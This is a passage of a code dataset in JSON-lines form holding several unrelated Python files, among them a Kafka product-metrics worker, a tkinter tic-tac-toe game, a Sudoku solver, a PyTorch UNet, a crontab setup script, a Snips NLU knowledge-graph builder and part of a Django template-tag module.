self.product_info.date_ls.append(self.datetime_to_str(date))\n self.product_info.new_last.append(0)\n self.product_info.sold_total_last.append(0)\n self.product_info.visit_total_last.append(0)\n self.product_info.price_last.append(Decimal(0))\n self.product_info.sold_last.append(0)\n self.product_info.visit_last.append(0)\n self.product_info.gmv_last.append(Decimal(0))\n for i in range(original_periods):\n date_str = self.datetime_to_str(new_start + timedelta(days=i - original_periods))\n self.product_info.date_ls[i] = date_str\n date_index_map = {date: i for i, date in enumerate(self.product_info.date_ls)}\n\n product_data_cnt = len(product_data_ls)\n for i, product_data in enumerate(product_data_ls):\n index = date_index_map[product_data.date]\n total_sold_delta = product_data.sold - self.product_info.sold_total_last[index]\n self.product_info.sold_total_last[index] = product_data.sold\n self.product_info.visit_total_last[index] = product_data.visit\n self.product_info.price_last[index] = product_data.price\n cur_sold = product_data.sold - self.product_info.sold_total_last[index - 1]\n print(\"cur_sold:{},product_data_sold:{},sold_total_list:{}\".format(cur_sold, product_data.sold, self.product_info.sold_total_last))\n cur_visit = product_data.visit - self.product_info.visit_total_last[index - 1]\n cur_gmv = product_data.price * cur_sold\n # generate deltas and calculate result only on real data\n if i == product_data_cnt - 1:\n self.calculate_indexes.add(index)\n is_new = True if not self.product_info.date \\\n or self.str_to_datetime(self.product_info.date) + timedelta(days=10) \\\n < self.str_to_datetime(product_data.date) else False\n if is_new:\n self.product_info.new_last[index] = 1\n self.product_info.sold_last[index] = cur_sold\n self.product_info.visit_last[index] = cur_visit\n self.product_info.gmv_last[index] = cur_gmv\n\n def calculate(self, key, product_data):\n self.incre()\n if EFFICIENT_SECOND_LIMIT + product_data.timestamp < time.time():\n print(\"efficient_limit\")\n return\n self.initialize(key, product_data)\n # print(\"--------product data %s\" % self.product_data)\n if self.product_info.batch_num == self.product_data.batch_num:\n print(\"batch_num\")\n return\n if sum(self.product_info.sold_last[-3:]) > 3 \\\n and self.product_data.timestamp + 86400 < time.time():\n yield SdkProductTask(batch_time=self.product_data.update_time,\n site=self.product_data.site,\n item_id=self.product_data.item_id)\n return\n if self.product_info.timestamp > self.product_data.timestamp:\n print(\"stable time:{} > data time\".format(self.product_info.date))\n return\n ori_state = copy.deepcopy(self.product_info)\n if self.product_info.timestamp >= self.product_data.timestamp:\n self.calculate_indexes.add(len(self.product_info.sold_last) - 1)\n else:\n product_data_ls = self.all_product_data(self.product_data)\n self.update_state(product_data_ls)\n # TODO: if state is change or not\n print(\"update stable\")\n print(\"stable sold_last_list:{}\".format(self.product_info.sold_last))\n new_state = ProductState(date=self.product_info.date_ls[-1],\n timestamp=max(self.product_data.timestamp, self.product_info.timestamp),\n batch_num=self.product_data.batch_num,\n price=self.product_info.price_last[-1],\n new_last=self.product_info.new_last[-1 * PRODUCT_PERIODS:],\n sold_total_last=self.product_info.sold_total_last[-1 * PRODUCT_TOTAL_PERIODS:],\n visit_total_last=self.product_info.visit_total_last[-1 * PRODUCT_TOTAL_PERIODS:],\n sold_last=self.product_info.sold_last[-1 * PRODUCT_PERIODS:],\n visit_last=self.product_info.visit_last[-1 * PRODUCT_PERIODS:],\n gmv_last=self.product_info.gmv_last[-1 * PRODUCT_PERIODS:],\n first_date=self.product_info.first_date if self.product_info.first_date else self.product_info.date_ls[-1])\n # print(\"--------new product info\")\n ori_state.show_diff(new_state)\n self.state_table[self.state_key] = new_state\n for result in map(self.convert_to_result, self.calculate_indexes):\n yield result\n\n def calculated_info(self, state, i, day_delta):\n print(\"before calculate stable:{}\".format(self.product_info.sold_last))\n if day_delta < 30:\n ls = list(filter(lambda x:x[1]>0, enumerate(state.sold_last)))\n if ls:\n index = ls[0][0]\n sold = state.sold_last[index]\n gmv = state.gmv_last[index]\n for n in range(min(index, max(len(state.sold_last)-day_delta, 0))):\n state.sold_last[n] = sold\n state.gmv_last[n] = gmv\n print(\"last before calculate stable:{}\".format(self.product_info.sold_last))\n sold_last_30 = sum(state.sold_last[i - 29:i + 1])\n gmv_last_30 = sum(state.gmv_last[i - 29:i + 1])\n pre_sold_last_1, sold_last_1 = state.sold_last[i - 1], state.sold_last[i],\n pre_sold_last_3, sold_last_3 = sum(state.sold_last[i - 3:i]), sum(state.sold_last[i - 2:i + 1])\n pre_sold_last_7, sold_last_7 = sum(state.sold_last[i - 7:i]), sum(state.sold_last[i - 6:i + 1])\n pre_gmv_last_1, gmv_last_1 = state.gmv_last[i - 1], state.gmv_last[i],\n pre_gmv_last_3, gmv_last_3 = sum(state.gmv_last[i - 3:i]), sum(state.gmv_last[i - 2:i + 1])\n pre_gmv_last_7, gmv_last_7 = sum(state.gmv_last[i - 7:i]), sum(state.gmv_last[i - 6:i + 1])\n visit_last_1 = state.visit_last[i]\n visit_last_3 = sum(state.visit_last[i - 2:i + 1])\n visit_last_7 = sum(state.visit_last[i - 6:i + 1])\n new_last_1 = int(any(state.new_last[i:i + 1]))\n new_last_3 = int(any(state.new_last[i - 2:i + 1]))\n new_last_7 = int(any(state.new_last[i - 6:i + 1]))\n return {\n \"sold_total\": state.sold_total_last[i],\n \"sold_last_1\": sold_last_1,\n \"sold_last_3\": sold_last_3,\n \"sold_last_7\": sold_last_7,\n \"sold_last_30\": sold_last_30,\n \"pre_sold_last_1\": pre_sold_last_1,\n \"pre_sold_last_3\": pre_sold_last_3,\n \"pre_sold_last_7\": pre_sold_last_7,\n \"sold_last_1_delta\": sold_last_1 - pre_sold_last_1,\n \"sold_last_3_delta\": sold_last_3 - pre_sold_last_3,\n \"sold_last_7_delta\": sold_last_7 - pre_sold_last_7,\n \"sold_last_1_pop\": round((sold_last_1 - pre_sold_last_1) / pre_sold_last_1 if pre_sold_last_1 else 0, 6),\n \"sold_last_3_pop\": round((sold_last_3 - pre_sold_last_3) / pre_sold_last_3 if pre_sold_last_3 else 0, 6),\n \"sold_last_7_pop\": round((sold_last_7 - pre_sold_last_7) / pre_sold_last_7 if pre_sold_last_7 else 0, 6),\n \"sold_2_to_last\": state.sold_last[i - 1],\n \"sold_3_to_last\": state.sold_last[i - 2],\n \"sold_4_to_last\": state.sold_last[i - 3],\n \"sold_5_to_last\": state.sold_last[i - 4],\n \"sold_6_to_last\": state.sold_last[i - 5],\n \"sold_7_to_last\": state.sold_last[i - 6],\n \"gmv_last_1\": gmv_last_1,\n \"gmv_last_3\": gmv_last_3,\n \"gmv_last_7\": gmv_last_7,\n \"gmv_last_30\": gmv_last_30,\n \"pre_gmv_last_1\": pre_gmv_last_1,\n \"pre_gmv_last_3\": pre_gmv_last_3,\n \"pre_gmv_last_7\": pre_gmv_last_7,\n \"gmv_last_1_delta\": gmv_last_1 - pre_gmv_last_1,\n \"gmv_last_3_delta\": gmv_last_3 - pre_gmv_last_3,\n \"gmv_last_7_delta\": gmv_last_7 - pre_gmv_last_7,\n \"gmv_last_1_pop\": round(float((gmv_last_1 - pre_gmv_last_1) / pre_gmv_last_1 if pre_gmv_last_1 else 0), 6),\n \"gmv_last_3_pop\": round(float((gmv_last_3 - pre_gmv_last_3) / pre_gmv_last_3 if pre_gmv_last_3 else 0), 6),\n \"gmv_last_7_pop\": round(float((gmv_last_7 - pre_gmv_last_7) / pre_gmv_last_7 if pre_gmv_last_7 else 0), 6),\n \"gmv_2_to_last\": state.gmv_last[i - 1],\n \"gmv_3_to_last\": state.gmv_last[i - 2],\n \"gmv_4_to_last\": state.gmv_last[i - 3],\n \"gmv_5_to_last\": state.gmv_last[i - 4],\n \"gmv_6_to_last\": state.gmv_last[i - 5],\n \"gmv_7_to_last\": state.gmv_last[i - 6],\n \"visit_total\": state.visit_total_last[i],\n \"visit_last_1\": visit_last_1,\n \"visit_last_3\": visit_last_3,\n \"visit_last_7\": visit_last_7,\n \"cvr_total\": round(state.sold_total_last[i] / state.visit_total_last[i] if state.visit_total_last[i] else 0,\n 6),\n \"cvr_last_1\": round(sold_last_1 / visit_last_1 if visit_last_1 else 0, 6),\n \"cvr_last_3\": round(sold_last_3 / visit_last_3 if visit_last_3 else 0, 6),\n \"cvr_last_7\": round(sold_last_7 / visit_last_7 if visit_last_7 else 0, 6),\n \"new_last_1\": new_last_1,\n \"new_last_3\": new_last_3,\n \"new_last_7\": new_last_7\n }\n\n def convert_to_result(self, i):\n date = self.product_info.date_ls[i]\n day_delta = 0\n if self.product_info.first_date:\n td = datetime.strptime(date, \"%Y-%m-%d\") - datetime.strptime(self.product_info.first_date, \"%Y-%m-%d\")\n day_delta = td.days\n info = self.calculated_info(self.product_info, i, day_delta)\n return ProductResult(\n item_id=self.product_data.item_id, site=self.product_data.site, date=date,\n brand=self.product_data.brand,\n seller=self.product_data.seller,\n category_ids=self.product_data.category_ids,\n leaf_category_ids=self.product_data.leaf_category_ids,\n category_paths=self.product_data.category_paths,\n category_l1_ids=self.product_data.category_l1_ids,\n category_l2_ids=self.product_data.category_l2_ids,\n category_l3_ids=self.product_data.category_l3_ids,\n price=self.product_info.price_last[i],\n visit=self.product_data.visit,\n sold=self.product_data.sold,\n img=self.product_data.img,\n title=self.product_data.title,\n item_location=self.product_data.item_location,\n item_location_country=self.product_data.item_location_country,\n store=self.product_data.store,\n store_location=self.product_data.store_location,\n marketplace=self.product_data.marketplace,\n popular=self.product_data.popular,\n update_time=self.product_data.update_time,\n gen_time=self.product_data.gen_time,\n data_update_time=self.product_data.data_update_time,\n **info)\n\n def deltas_generator(self, start, end, period_num, delta_type='int'):\n total_delta = end - start\n if delta_type == 'decimal':\n assert isinstance(total_delta, Decimal)\n delta = round(total_delta / period_num, 2)\n deltas = [delta] * (period_num - 1)\n deltas.append(total_delta - sum(deltas))\n return deltas\n elif delta_type == 'int':\n assert isinstance(total_delta, int)\n deltas = [total_delta // period_num] * period_num\n for i in random.sample(range(len(deltas)), total_delta % period_num):\n deltas[i] += 1\n return deltas\n\n\napp = faust.App('ebay-product-calculate', broker=\"kafka://47.112.96.218:9092\", store='rocksdb://',\n topic_replication_factor=1,\n topic_partitions=1)\n'''\n@app.on_configured.connect\ndef configure(app, conf, **kwargs):\n conf.topic_replication_factor = TOPIC_REPLICATION\n conf.topic_partitions = TOPIC_PARTITION\n'''\n\nproduct_data_topic = app.topic('ebay-product-data1', key_type=str,\n value_type=ProductData)\nproduct_info_table = app.Table('ebay-product-infos14',\n default=default_product_state,\n key_type=str, value_type=ProductState\n )\nproduct_result_topic = app.topic('ebay-product-result', value_type=ProductResult)\n\n\n@app.agent(product_data_topic, concurrency=1)\nasync def product_calculate(stream):\n calculator = ProductCalculator(product_info_table)\n start_time = time.time()\n async for key, product_data in stream.items():\n for product_result in calculator.calculate(key, product_data):\n print(product_result)\n print(product_info_table['uk263548829995'])\n # if isinstance(product_result, ProductResult):\n # await product_result_topic.send(value=product_result)\n # else:\n # await sdk_task_topic.pub(product_result.dumps())\n now_time = time.time()\n if start_time + 10 < now_time:\n print(\"speed: {}\".format(calculator.count / (now_time - start_time)))\n calculator.reset_count()\n start_time = now_time\n\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n app.main()\n","sub_path":"kafka_faust_english_nlp/product_calculate_worker.py","file_name":"product_calculate_worker.py","file_ext":"py","file_size_in_byte":23085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"217616814","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 23 21:21:18 2016\n\n@author: BRUNO IAMPOLSKY\n\"\"\"\nimport tkinter as tk\nimport random\n\nclass Tabuleiro:\n \n def __init__(self, geral):\n \n self.frame = tk.Frame(geral)\n self.frame.pack(fill=\"both\")\n\n self.canvas = tk.Canvas(self.frame, width=600, height=600)\n self.canvas.pack(fill=\"both\")\n self.frame= tk.Frame(self.frame)\n self.frame.pack(fill=\"both\")\n \n self.Start= tk.Button(self.frame, text='Press this Red Button to Play!', height=4, command=self.jogada, bg='red', fg='white')\n self.Start.pack(fill=\"both\")\n nome = \"X\"\n self.label= tk.Label(self.frame, text=\"Next is: %s\"%nome, height=4, bg='black', fg='blue')\n self.label.pack(fill=\"both\") \n \n self._tabuleiro()\n \n def _tabuleiro(self):\n \n self.canvas.create_rectangle(0,0,600,600, outline=\"black\")\n \n self.canvas.create_rectangle(200,600,400,0, outline=\"black\")\n \n self.canvas.create_rectangle(0,200,600,400, outline=\"black\")\n \n \n def jogada(self):\n self.canvas.delete(tk.ALL)\n self.canvas.bind(\"\", self.pecas) \n self._tabuleiro()\n \n self.matriz=[[0,0,0],[0,0,0],[0,0,0]]\n self.preenchido=0\n \n def pecas(self,peca):\n for a in range(0,600,200):\n \n for b in range(0,600,200):\n \n if (peca.x in range(a,a +200)) and (peca.y in range(b,b +200)):\n if self.canvas.find_enclosed(a,b,a+200,b+200)==():\n \n X=(2*a+200)/2\n Y=(2*b+200)/2\n linha=int(a/200)\n coluna=int(b/200)\n cores = random.choice([\"black\", \"blue\", \"red\", \"lightblue\", \"purple\", \"grey\"])\n \n if self.preenchido % 2 == 0:\n \n self.canvas.create_line( X+40, Y+40, X-40, Y-40, width=12, fill=\"black\")\n self.canvas.create_line( X-40, Y+40, X+40, Y-40, width=12, fill=\"black\")\n self.matriz[coluna][linha]+=9\n \n self.label['text']=(\"Next is: O\")\n \n self.preenchido+=1\n \n else:\n self.canvas.create_oval( X+50, Y+50, X-50, Y-50, width=12, outline= cores)\n self.matriz[coluna][linha]+=1\n \n self.label['text']=(\"Next is: X\")\n \n self.preenchido+=1\n \n \n \n \n\nroot= tk.Tk()\napp=Tabuleiro(root)\nroot.mainloop()\n\n \n ","sub_path":"Tabuleiro1.1.py","file_name":"Tabuleiro1.1.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"148794036","text":"from algorithms import BruteForce, CombinedSolver, SmartSolver\nfrom settings import Settings\nimport time\nimport typing\n\n\n# Examples. Take user input by uncomment line 148 and commend line 149 to take input from user\n# Easy\n#sample = \"000004670009200801007613049050100284010000396496800050300061020085400060900078000\"\n# Hard. Slowly solved by bruteforce but fast by smarter alghorithm\nsample = \"000801000000000043500000000000070800000000100020030000600000075003400000000200600\"\n# Hard, designed against bruteforce. Very slow solution using bruteforce but fast solved using smarter algorithm\n#sample = \"000000000000003085001020000000507000004000100090000000500000073002010000000040009\"\n\n\nclass Game:\n \"\"\"stores board state and methods\n board: (nested list of rows) Representation of the board. 0 = empty cell\n [[0, 1, 2, 3, 4, 5, 6, 7, 8],\n [0, 1, 2, 3, 4, 5, 6, 7, 8],\n [0, 1, 2, 3, 4, 5, 6, 7, 8],\n [0, 1, 2, 3, 4, 5, 6, 7, 8],\n [0, 1, 2, 3, 4, 5, 6, 7, 8],\n [0, 1, 2, 3, 4, 5, 6, 7, 8],\n [0, 1, 2, 3, 4, 5, 6, 7, 8],\n [0, 1, 2, 3, 4, 5, 6, 7, 8],\n [0, 1, 2, 3, 4, 5, 6, 7, 8]]\"\"\"\n\n board: typing.List[typing.List[int]] = []\n\n def __init__(self, input_sequence: typing.AnyStr):\n \"\"\"Transformation of input string into list of int\"\"\"\n position_counter = 0\n\n for _ in range(Settings.row_number):\n row = []\n for _ in range(Settings.column_number):\n row.append(int(input_sequence[position_counter]))\n position_counter += 1\n self.board.append(row)\n\n def draw(self):\n \"\"\"Draw current state of board in human-friendly form\"\"\"\n\n row_counter = 0\n column_counter = 0\n\n print(\"-\" * Settings.screen_width)\n\n for row in self.board:\n print(\"| \", end=\"\")\n for cell in row:\n if cell != 0:\n print(cell, end=\" \")\n else:\n print(\" \", end=\" \")\n row_counter += 1\n if row_counter == 3:\n print(\"| \", end=\"\")\n row_counter = 0\n column_counter += 1\n if column_counter == 3:\n print(\"\\n\", \"-\" * Settings.screen_width, sep=\"\")\n column_counter = 0\n else:\n print()\n\n def brutal_solution(self):\n \"\"\"Bruteforce with backtracking. Check every state of board until find correct one\"\"\"\n solver = BruteForce(self.board)\n self.board = solver.solve()\n\n def less_brutal_solution(self):\n \"\"\"Fill part of the board (or whole in easier puzzles) using James Crook algorithm and fill rest using\n bruteforce\"\"\"\n solver = CombinedSolver(self.board)\n self.board = solver.solve()\n\n def smart_solution(self):\n \"\"\"Implementation of James Crook algorithm.\"\"\"\n solver = SmartSolver(self.board)\n self.board = solver.solve()\n\n\ndef input_from_console() -> typing.AnyStr:\n \"\"\"Takes input from user using console and check if it is correct.\n :returns: board sequence (string).\"\"\"\n board_sequence = \"\"\n line_counter = 1\n print(\"Insert board state (from left to right, without space, 'Enter' after every line)\\nif cell is empty type '0'\")\n while True:\n line = input(f\"line {line_counter}: \")\n\n if len(line) != 9:\n print(f\"line must contain 9 digits. Input line {line_counter} again.\\nNote: type '0' for empty cell\")\n continue\n elif line.isdecimal() is False:\n print(f\"line must contain only digits. Input line {line_counter} again.\\nNote: type '0' for empty cell\")\n continue\n else:\n line_counter += 1\n board_sequence += line\n\n if line_counter == 10:\n if input_validation(board_sequence) is True:\n return board_sequence\n else:\n print(\"Input is not valid. Try again.\")\n line_counter = 1\n\n\ndef input_validation(board_sequence: typing.AnyStr) -> bool:\n \"\"\"Validation of user input. Be aware that function checks only repetition of number in rows, columns and squares\n not the solvability of puzzle. Return True if input is valid, else return False\n :param board_sequence: Inserted interpretation of board\n :return: True if sequence is correct otherwise False\"\"\"\n\n counter_line = 0\n counter_col = 0\n\n for _ in range(Settings.row_number):\n line = set()\n column = set()\n for _ in range(Settings.column_number):\n\n # line check\n if board_sequence[counter_line] != \"0\":\n if board_sequence[counter_line] not in line:\n line.add(board_sequence[counter_line])\n else:\n return False\n counter_line += 1\n\n # column check\n if board_sequence[counter_col] != \"0\":\n if board_sequence[counter_col] not in column:\n column.add(board_sequence[counter_col])\n else:\n return False\n counter_col += 9\n counter_col -= 80\n return True\n\n\ndef start_here():\n \"\"\"Start program\"\"\"\n # input from console or sample. Uncomment line 148 and commend line 149 to take input from user\n # board_sequence = input_from_console()\n board_sequence = sample\n\n # initiation of Board instance and draw initial state\n game = Game(board_sequence)\n game.draw()\n\n # show menu and select algorithm\n while True:\n x = input(\"1. Brutal solution\\n2. Less brutal solution\\n3. Smart solution\\nChoose solution: \")\n\n if x != \"1\" and x != \"2\" and x != \"3\":\n print(\"unknown command. Try again\\n\")\n else:\n break\n\n print(\"Working...\")\n\n if x == \"1\":\n start = time.time()\n game.brutal_solution()\n elif x == \"2\":\n start = time.time()\n game.less_brutal_solution()\n elif x == \"3\":\n start = time.time()\n game.smart_solution()\n\n stop = time.time()\n\n game.draw()\n print(f\"complete in {stop - start} sec\")\n\n\nif __name__ == \"__main__\":\n start_here()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"464443575","text":"import numpy as np\n\n\ndef mean_squared_error(y, t):\n batch_size = y.shape[0]\n diff = y - t\n return 0.5 * np.sum(diff**2) / batch_size\n\ndef huber_loss(y, t, delta):\n a = np.abs(y - t)\n loss = np.where(a <= delta, 0.5 * a**2, delta * (a - 0.5 * delta))\n return loss\n\ndef cross_entropy_error(y, t, eps=1e-7):\n if y.ndim == 1:\n t = t.reshape(1, t.size)\n y = y.reshape(1, y.size)\n if t.size == y.size:\n t = t.argmax(axis=1)\n batch_size = y.shape[0]\n return -np.sum(np.log(y[np.arange(batch_size), t] + eps)) / batch_size","sub_path":"losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"304470310","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom .utils import weights_init\n\n\ndef define_U(device, in_channel=1, out_channel=3):\n u = UNet(in_channel=in_channel, out_channel=out_channel).to(device)\n u.apply(weights_init)\n return u\n\n\nclass Down(nn.Module):\n def __init__(self, in_nc, out_nc, ks, s, p, leaky=False):\n super(Down, self).__init__()\n self.layer = nn.Sequential(\n nn.Conv2d(in_nc, out_nc, ks, s, p),\n nn.BatchNorm2d(out_nc),\n nn.LeakyReLU(0.2) if leaky else nn.ReLU()\n )\n\n def forward(self, x):\n return self.layer(x)\n\n\ndef InConv(img_nc, out_nc, leaky=False):\n return Down(img_nc, out_nc, 3, 1, 1, leaky)\n\n\ndef Down3x3(in_nc, out_nc, leaky=False):\n return Down(in_nc, out_nc, 3, 1, 1, leaky)\n\n\ndef Down4x4(in_nc, out_nc, leaky=False):\n return Down(in_nc, out_nc, 4, 2, 1, leaky)\n\n\nclass Up(nn.Module):\n def __init__(self, nc, ks1=4, ks2=3,\n s1=2, s2=1, p1=1, p2=1):\n super(Up, self).__init__()\n self.layer1 = nn.Sequential(\n nn.ConvTranspose2d(nc, int(nc / 2), ks1, s1, p1),\n nn.BatchNorm2d(nc // 2),\n nn.ReLU(inplace=True)\n )\n self.layer2 = nn.Sequential(\n nn.Conv2d(int(nc/2), int(nc/4), ks2, s2, p2),\n nn.BatchNorm2d(nc // 4),\n nn.ReLU(inplace=True)\n )\n\n def forward(self, x1, x2):\n # if x1.size is not equal to x2.size, padding small image.\n diff_y = x2.size()[2] - x1.size()[2]\n diff_x = x2.size()[3] - x1.size()[3]\n x1 = F.pad(x1, [diff_x//2, diff_x - diff_x//2,\n diff_y//2, diff_y - diff_y//2])\n x = self.layer1(torch.cat([x2, x1], dim=1))\n return self.layer2(x)\n\n\nclass Out(nn.Module):\n\n def __init__(self, in_nc, out_nc, ks=3, s=1, p=1):\n super(Out, self).__init__()\n self.down = nn.Sequential(\n nn.Conv2d(in_nc, out_nc, ks, s, p),\n nn.BatchNorm2d(out_nc),\n nn.Tanh()\n )\n\n def forward(self, x1, x2):\n diff_y = x2.size()[2] - x1.size()[2]\n diff_x = x2.size()[3] - x1.size()[3]\n x1 = F.pad(x1, [diff_x // 2, diff_x - diff_x // 2,\n diff_y // 2, diff_y - diff_y // 2])\n return self.down(torch.cat([x2, x1], dim=1))\n\n\nclass UNet(nn.Module):\n\n def __init__(self, in_channel=1, out_channel=3, ngf=32):\n super(UNet, self).__init__()\n self.in_layer = InConv(in_channel, ngf)\n self.down1 = Down4x4(ngf, ngf*2)\n self.down2 = Down3x3(ngf*2, ngf*2)\n self.down3 = Down4x4(ngf*2, ngf*4)\n self.down4 = Down3x3(ngf*4, ngf*4)\n self.down5 = Down4x4(ngf*4, ngf*8)\n self.down6 = Down3x3(ngf*8, ngf*8)\n self.down7 = Down4x4(ngf*8, ngf*16)\n self.down8 = Down3x3(ngf*16, ngf*16)\n self.up1 = Up(ngf*32)\n self.up2 = Up(ngf*16)\n self.up3 = Up(ngf*8)\n self.up4 = Up(ngf*4)\n self.out = Out(ngf*2, out_channel)\n\n def forward(self, x):\n x1 = self.in_layer(x)\n x2 = self.down1(x1)\n x3 = self.down2(x2)\n x4 = self.down3(x3)\n x5 = self.down4(x4)\n x6 = self.down5(x5)\n x7 = self.down6(x6)\n x8 = self.down7(x7)\n x9 = self.down8(x8)\n\n x = self.up1(x8, x9)\n x = self.up2(x, x7)\n x = self.up3(x, x5)\n x = self.up4(x, x3)\n x = self.out(x, x1)\n return x\n","sub_path":"network/unet.py","file_name":"unet.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"581504927","text":"import yaml\n\n\nCONFIG_FILE = 'config.yaml'\nCRONTAB_FILE = '/etc/crontabs/root'\n\n\ndef main():\n\n with open(CONFIG_FILE) as f:\n cfg = yaml.safe_load(f)\n cl_checks = cfg['craigslist']['checks']\n\n with open(CRONTAB_FILE, \"a\") as f:\n for check in cl_checks:\n f.write(f'{check[\"cron\"]} python /code/craigcheckr.py --url=\\\"{check[\"url\"]}\\\" > /proc/1/fd/1 2>/proc/1/fd/2\\n')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"setup_crontab.py","file_name":"setup_crontab.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"540674557","text":"\n\nfrom xai.brain.wordbase.verbs._doubt import _DOUBT\n\n#calss header\nclass _DOUBTS(_DOUBT, ):\n\tdef __init__(self,): \n\t\t_DOUBT.__init__(self)\n\t\tself.name = \"DOUBTS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"doubt\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_doubts.py","file_name":"_doubts.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"223027871","text":"import io\nimport json\nfrom snips_nlu import SnipsNLUEngine\nfrom snips_nlu.default_configs import CONFIG_EN\n\ndef main():\n\t#kg from unstructured data\n\tf = open('unstructured_text_book_input_chickpea.txt')\n\tlines = f.readlines()\n\tinput_lines = []\n\tfor line in lines:\n\t\t# print('here1: '+str(line))\n\t\twords = line.split(' ')\n\t\tin_line = []\n\t\tfor word in words:\n\t\t\tif word=='and' or word==',' or word=='but':\n\t\t\t\tinput_lines.append(in_line)\n\t\t\t\tin_line = []\n\t\t\t\tin_line.append('Chickpea')\n\t\t\telse:\n\t\t\t\tin_line.append(word)\n\t\tif in_line!=[]:\n\t\t\tinput_lines.append(in_line)\n\tf.close()\n\tf = open('input.txt','w+')\n\tfor line in input_lines:\n\t\t# print('here2: '+str(line))\n\t\tfor word in line:\n\t\t\tf.write(word+' ')\n\t\tf.write('\\n')\n\tf.close()\n\n\tengine = SnipsNLUEngine(config = CONFIG_EN)\n\twith io.open(\"dataset1.json\") as f:\n\t\tdataset = json.load(f)\n\n\tengine.fit(dataset)\n\t_dict = {}\n\t_dict['chickpea']={}\n\tin_file = open('input.txt', 'r')\n\tlines = in_file.readlines()\n\tfor line in lines:\n\t\tif len(line)<=2:\n\t\t\tprint('hi')\n\t\t\tcontinue\n\t\tprint('line: '+str(line))\n\t\tparsing = engine.parse(line)\n\t\tprint('parsing results: ')\n\t\tprint(parsing)\n\t\trelation = parsing['intent']['intentName']\n\t\tprob = float(parsing['intent']['probability'])\n\t\tprint('prob: '+str(prob))\n\t\tprint('relation: '+str(relation))\n\t\tif relation!='None' and prob>=0.3:\n\t\t\t# print('here')\n\t\t\tslots = parsing['slots']\n\t\t\tfor slot in slots:\n\t\t\t\tif slot['entity']!='crop':\n\t\t\t\t\tif relation not in _dict['chickpea'].keys():\n\t\t\t\t\t\t# print('case1: ')\n\t\t\t\t\t\t# print('relation: '+str(relation))\n\t\t\t\t\t\t_dict['chickpea'][relation] = slot['rawValue']\n\t\t\t\t\telse:\n\t\t\t\t\t\t# print('case2: ')\n\t\t\t\t\t\t# print('relation: '+str(relation))\n\t\t\t\t\t\t_dict['chickpea'][relation] += (','+slot['rawValue']) \n\tprint('_dict:-')\n\tprint(_dict)\n\t#_dict_json = json.dumps(_dict)\n\tin_file.close()\n\twith open(\"output_kg_chickpea.json\", \"w\") as outfile:\n\t\tjson.dump(_dict, outfile)\n\twith open('output_kg_chickpea.json', 'r') as openfile:\n\t\tjson_object = json.load(openfile)\n\tprint(json_object) \n\t#reading and including structured data on disease management in knowledge graph\n\t# f = open('structured_chickpea_disease.txt','r')\n\t# lines = f.readlines()\n\t# f.close()\n\t# diseases_list = []\n\t# flag=0\n\t# diseaseName =''\n\t# dict_2_insert={}\n\t# cnt =0\n\t# for line in lines:\n\t# \tline = line[:-1]\n\t# \tif line=='##':\n\t# \t\tcnt=1\n\t# \telse:\n\t# \t\tif cnt==1:\n\t# \t\t\tcnt = 2\n\t# \t\t\tif len(dict_2_insert.keys())>0:\n\t# \t\t\t\tdiseases_list.append(dict_2_insert)\n\t# \t\t\tdiseaseName = line\n\t# \t\t\tdict_2_insert[diseaseName] = {}\n\t# \t\telif cnt==2:\n\t# \t\t\tdict_2_insert[diseaseName]['symptom'] = line\n\t# \t\t\tcnt=3\n\t# \t\telse:\n\t# \t\t\tif 'management' not in dict_2_insert[diseaseName].keys():\n\t# \t\t\t\tdict_2_insert[diseaseName]['management'] = line\n\t# \t\t\telse:\n\t# \t\t\t\tdict_2_insert[diseaseName]['management'] += (':: '+line)\n\t# print(diseases_list)\n\t# json_object['diseases']=diseases_list\n\t# with open(\"output_kg_chickpea.json\", \"w+\") as outfile:\n\t# \tjson.dump(json_object, outfile)\n\t#reading and including structured data on disease management in knowledge graph\n\t# with open('output_kg_chickpea.json', 'r') as openfile:\n\t# \tjson_object = json.load(openfile)\n\t# print(json_object) \n\t# f = open('structured_chickpea_post_prod.txt','r')\n\t# lines = f.readlines()\n\t# f.close()\n\t# line = lines[0][:-1]\n\t# json_object['postProductionTechnique'] = line\n\t# with open(\"output_kg_chickpea.json\", \"w+\") as outfile:\n\t# \tjson.dump(json_object, outfile)\nif __name__ == '__main__':\n\tmain()","sub_path":"Knowledge Graph Creation/Intent-Identification-Slot-Tagging-Snips/create_km_chickpea.py","file_name":"create_km_chickpea.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"18717026","text":"import logging\n\nfrom django import template\nfrom django.conf import settings\nfrom django.template.loader import render_to_string\nfrom django.utils import timezone\nfrom django.utils.module_loading import import_string\nfrom django.utils.safestring import SafeString\n\nfrom cms.contexts.utils import handle_faulty_templates\nfrom cms.pages.models import Category\nfrom cms.publications.models import Publication, PublicationContext\n\n\nlogger = logging.getLogger(__name__)\nregister = template.Library()\n\n\ndef _get_pub_qparams(context, webpath, section = None, in_evidence=False,\n categories_csv=None, tags_csv=None):\n now = timezone.localtime()\n query_params = dict(webpath=context['webpath'],\n is_active=True,\n publication__is_active=True,\n publication__date_start__lte=now,\n publication__state=\"published\")\n if section:\n query_params['section'] = section\n if in_evidence:\n 